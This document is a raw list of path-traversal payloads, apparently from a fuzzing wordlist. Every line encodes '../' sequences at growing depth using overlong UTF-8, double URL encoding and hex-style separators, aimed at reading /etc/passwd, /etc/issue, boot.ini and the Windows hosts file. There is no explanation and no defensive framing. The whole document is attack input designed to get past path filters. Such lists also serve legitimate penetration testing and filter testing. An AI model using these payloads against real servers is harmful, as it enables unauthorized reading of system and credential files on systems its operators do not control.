-%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afissue -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afboot.ini -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afissue -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afboot.ini -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%2e%c0%2e%f8%80%80%80%afboot.ini -%c0%2e%c0%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afboot.ini -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afboot.ini -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afboot.ini -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afboot.ini -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afboot.ini -%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%af%c0%2e%c0%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ae%c0%ae/etc/passwd -%c0%ae%c0%ae/etc/issue -%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/windows/system32/drivers/etc/hosts -%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issue -%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issue -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issue -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issue -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issue -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts -%c0%ae%c0%ae\etc\passwd -%c0%ae%c0%ae\etc\issue -%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\windows\system32\drivers\etc\hosts -%c0%ae%c0%ae\%c0%ae%c0%ae\etc\passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\etc\issue -%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\windows\system32\drivers\etc\hosts -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\issue -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\windows\system32\drivers\etc\hosts -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\issue -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\windows\system32\drivers\etc\hosts -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\issue -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\windows\system32\drivers\etc\hosts -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\issue -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\boot.ini -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\windows\system32\drivers\etc\hosts -%c0%ae%c0%ae%2fetc%2fpasswd -%c0%ae%c0%ae%2fetc%2fissue -%c0%ae%c0%ae%2fboot.ini -%c0%ae%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fissue -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fboot.ini -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fissue -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fboot.ini -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fissue -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fboot.ini -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fissue -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fboot.ini -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fissue -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fboot.ini -%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ae%c0%ae%5cetc%5cpasswd -%c0%ae%c0%ae%5cetc%5cissue -%c0%ae%c0%ae%5cboot.ini -%c0%ae%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cpasswd -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cissue -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cboot.ini -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cpasswd -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cissue -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cboot.ini -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cpasswd -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cissue -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cboot.ini -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cpasswd -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cissue -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cboot.ini -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cpasswd -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cetc%5cissue -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cboot.ini -%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5c%c0%ae%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ae%c0%ae0x2fetc0x2fpasswd -%c0%ae%c0%ae0x2fetc0x2fissue -%c0%ae%c0%ae0x2fboot.ini -%c0%ae%c0%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fpasswd -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fissue -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fboot.ini -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fpasswd -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fissue -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fboot.ini -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fpasswd -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fissue -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fboot.ini -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fpasswd -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fissue -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fboot.ini -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fpasswd -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fetc0x2fissue -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fboot.ini -%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2f%c0%ae%c0%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ae%c0%ae0x5cetc0x5cpasswd -%c0%ae%c0%ae0x5cetc0x5cissue -%c0%ae%c0%ae0x5cboot.ini -%c0%ae%c0%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cpasswd -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cissue -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cboot.ini -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cpasswd -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cissue -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cboot.ini -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cpasswd -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cissue -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cboot.ini -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cpasswd -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cissue -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cboot.ini -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cpasswd -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cetc0x5cissue -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cboot.ini -%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5c%c0%ae%c0%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ae%c0%ae%252fetc%252fpasswd -%c0%ae%c0%ae%252fetc%252fissue -%c0%ae%c0%ae%252fboot.ini -%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fissue -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fboot.ini -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fissue -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fboot.ini -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fissue -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fboot.ini -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fissue -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fboot.ini -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fissue -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fboot.ini -%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ae%c0%ae%255cetc%255cpasswd -%c0%ae%c0%ae%255cetc%255cissue -%c0%ae%c0%ae%255cboot.ini -%c0%ae%c0%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cpasswd -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cissue -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cboot.ini -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cpasswd -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cissue -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cboot.ini -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cpasswd -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cissue -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cboot.ini 